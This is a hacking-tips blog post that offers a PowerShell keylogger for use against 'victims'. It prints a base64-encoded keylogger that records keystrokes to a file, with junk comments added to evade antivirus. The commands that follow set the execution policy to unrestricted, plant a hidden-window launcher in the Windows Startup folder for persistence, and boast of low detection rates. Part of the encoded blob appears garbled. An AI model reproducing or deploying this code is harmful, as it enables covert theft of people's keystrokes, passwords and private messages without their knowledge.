Hacking Tips & Tricks
Trending

Make PowerShell Keyloggers Virus

PowerShell is a great tool for making all your virus needs. You can do almost anything in PowerShell, including making keyloggers.

Shakil Ahmed
0 1 minute read
Make PowerShell Keyloggers Virus
Make PowerShell Keyloggers Virus

PowerShell is a great tool for making all your virus needs. You can do almost anything in PowerShell, including making keyloggers. Though it is more practical to make them in VB or C# here is a simple and effective piece of keylogger code:

 

 

All those random comments actually do something with I will explain in a minute.

So if you run this in PowerShell it comes up as a PowerShell window, something obvious and suspicious. Also, you can convert it into a .exe file but anti-virus catches those pretty easily.

So I converted the script into base64 and ran a program that decrypts it and runs the code, the random comments add randomness to the base64 encryption. The program looks like this:

 

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“I3JlcXVpcmVzIC1WZXJzaW9uIDINCg0KI0xPTCBZT1UgQ1JBWlkNCmZ1bmN0aW9uIFN0YXJ0LUtleUxvZ2dlcigkUGF0aD0iQzovdXNlcnMvcHVibGljL2xvZ2ZpbGUudHh0IikgDQp7DQogICMgU2lnbmF0dXJlcyBmb3IgQVBJIENhbGxzDQogICRzaWduYXR1cmVzID0gQCcNCltEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0bywgRXhhY3RTcGVsbGluZz10cnVlKV0gDQpwdWJsaWMgc3RhdGljIGV4dGVybiBzaG9ydCBHZXRBc3luY0tleVN0YXRlKGludCB2aXJ0dWFsS2V5Q29kZSk7IA0KW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0NCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRLZXlib2FyZFN0YXRlKGJ5dGVbXSBrZXlzdGF0ZSk7DQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE1hcFZpcnR1YWxLZXkodWludCB1Q29kZSwgaW50IHVNYXBUeXBlKTsNCltEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldDQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgVG9Vbmljb2RlKHVpbnQgd1ZpcnRLZXksIHVpbnQgd1NjYW5Db2RlLCBieXRlW10gbHBrZXlzdGF0ZSwgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBwd3N6QnVmZiwgaW50IGNjaEJ1ZmYsIHVpbnQgd0ZsYWdzKTsNCidADQojTE9MIFlPVSBDUkFaWQ0KICAjIGxvYWQgc2lnbmF0dXJlcyBhbmQgbWFrZSBtZW1iZXJzIGF2YWlsYWJsZQ0KICAkQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNpZ25hdHVyZXMgLU5hbWUgJ1dpbjMyJyAtTmFtZXNwYWNlIEFQSSAtUGFzc1RocnUNCiAgICNMT0wgWU9VIENSQVpZIA0KICAjIGNyZWF0ZSBvdXRwdXQgZmlsZQ0KICAkbnVsbCA9IE5ldy1JdGVtIC1QYXRoICRQYXRoIC1JdGVtVHlwZSBGaWxlIC1Gb3JjZQ0KDQogIHRyeQ0KICB7DQogICAgV14BexZMoP1gqvSbLZSfYigjUvfcXkroScKIGtleSBwcmVzc2VzLiBQcmVzcyBDVFJMK0MgdG8gc2VlIHJlc3VsdHMuJyAtRm9yZWdyb3VuZENvbG9yIFJlZA0KI0xPTCBZT1UgQ1JBWlkNCiAgICAjIGNyZWF0ZSBlbmRsZXNzIGxvb3AuIFdoZW4gdXNlciBwcmVzc2VzIENUUkwrQywgZmluYWxseS1ibG9jaw0KICAgICMgZXhlY3V0ZXMgYW5kIHNob3dzIHRoZSBjb2xsZWN0ZWQga2V5IHByZXNzZXMNCiAgICB3aGlsZSAoJHRydWUpIHsNCiAgICAgIFN0YXJ0LVNsZWVwIC1NaWxsaXNlY29uZHMgNDANCiAgI0xPTCBZT1UgQ1JBWlkgICAgDQogICAgICAjIHNjYW4gYWxsIEFTQ0lJIGNvZGVzIGFib3ZlIDgNCiAgICAgIGZvciAoJGFzY2lpID0gOTsgJGFzY2lpIC1sZSAyNTQ7ICRhc2NpaSsrKSB7DQogICAgICAgICMgZ2V0IGN1cnJlbnQga2V5IHN0YXRlDQogICAgICAgICRzdGF0ZSA9ICRBUEk6OkdldEFzeW5jS2V5U3RhdGUoJGFzY2lpKQ0KI0xPTCBZT1UgQ1JBWlkNCiAgICAgICAgIyBpcyBrZXkgcHJlc3NlZD8NCiAgICAgICAgaWYgKCRzdGF0ZSAtZXEgLTMyNzY3KSB7DQogICAgICAgICAgJG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrDQojTE9MIFlPVSBDUkFaWQ0KICAgICAgICAgICMgdHJhbnNsYXRlIHNjYW4gY29kZSB0byByZWFsIGNvZGUNCiAgICAgICAgICAkdmlydHVhbEtleSA9ICRBUEk6Ok1hcFZpcnR1YWxLZXkoJGFzY2lpLCAzKQ0KI0xPTCBZT1UgQ1JBWlkga3NqYXNpYWZic2RoYnYNCiAgICAgICAgICAjIGdldCBrZXlib2FyZCBzdGF0ZSBmb3IgdmlydHVhbCBrZXlzDQogICAgICAgICAgJGtic3RhdGUgPSBOZXctT2JqZWN0IEJ5dGVbXSAyNTYNCiAgICAgICAgICAkY2hlY2trYnN0YXRlID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdGF0ZSkNCiNMT0wgWU9VIENSQVpZIGtzamFzaWFmYnNkaGJ2DQogICAgICAgICAgIyBwcmVwYXJlIGEgU3RyaW5nQnVpbGRlciB0byByZWNlaXZlIGlucHV0IGtleQ0KICAgICAgICAgICRteWNoYXIgPSBOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyDQojTE9MIFlPVSBDUkFaWSBrc2phc2lhZmJzZGhidg0KICAgICAgICAgICMgdHJhbnNsYXRlIHZpcnR1YWwga2V5DQogICAgICAgICAgJHN1Y2Nlc3MgPSAkQVBJOjpUb1VuaWNvZGUoJGFzY2lpLCAkdmlydHVhbEtleSwgJGtic3RhdGUsICRteWNoYXIsICRteWNoYXIuQ2FwYWNpdHksIDApDQojTE9MIFlPVSBDUkFaWSBrc2phc2lhZmJzZGhidg0KICAgICAgICAgIGlmICgkc3VjY2VzcykgDQogICAgICAgICAgew0KICAgICAgICAgICAgIyBhZGQga2V5IHRvIGxvZ2dlciBmaWxlDQogICAgICAgICAgICBbU3lzdGVtLklPLkZpbGVdOjpBcHBlbmRBbGxUZXh0KCRQYXRoLCAkbXljaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKSANCiAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgIH0NCiAgICB9DQogIH0NCiAgZmluYWxseQ0KICB7DQogICAgIyBvcGVuIGxvZ2dlciBmaWxlIGluIE5vdGVwYWQNCiAgICAjTE9MIFlPVSBDUkFaWSBrc2phc2lhZmJzZGhidg0KICB9DQp9DQoNCiMgcmVjb3JkcyBhbGwga2V5IHByZXNzZXMgdW50aWwgc2NyaXB0IGlzIGFib3J0ZWQgYnkgcHJlc3NpbmcgQ1RSTCtDDQojIHdpbGwgdGhlbiBvcGVuIHRoZSBmaWxlIHdpdGggY29sbGVjdGVkIGtleSBjb2Rlcw0KU3RhcnQtS2V5TG9nZ2VyDQojTE9MIFlPVSBDUkFaWSBrc2phc2lhZmJzZGhidg0KDQojTE9MIFlPVSBDUkFaWSBrc2phc2lhZmJzZGhidg==”)) >C:\users\Public\logfile.ps1set-executionpolicy unrestrictedecho powershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1 >C:\Users\charl\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.batpowershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1

 

So if you convert this into a .exe file currently only 13 of 66 anti-viruses detect it on virus total, so if you load it onto a system with these anti-viruses it probably won’t work. I could probably do better encryption but it’s ok for a small project.

There are currently 13 anti-viruses that detect it a virus, so if your victim doesn’t have one of those your good to go.

Tags
Shakil Ahmed
0 1 minute read
Photo of Shakil Ahmed

Shakil Ahmed

I'm a Content writer. My topic is Tech, Story, SEO, Digital Marketing etc. I'm Work With MDOmarMakki.Org Website for CEO of This Website MD Omar Makki

Related Articles

Regedit Hacks

Regedit Hacks

How to shutdown computer from cmd

How to shutdown computer from cmd

Creating and Spreading virus from a Pendrive

Creating and Spreading virus from a Pen-drive

How to delete an undeletable file

How to delete an undeletable file

0 Comments
Back to top button
error: Alert: Content is protected !!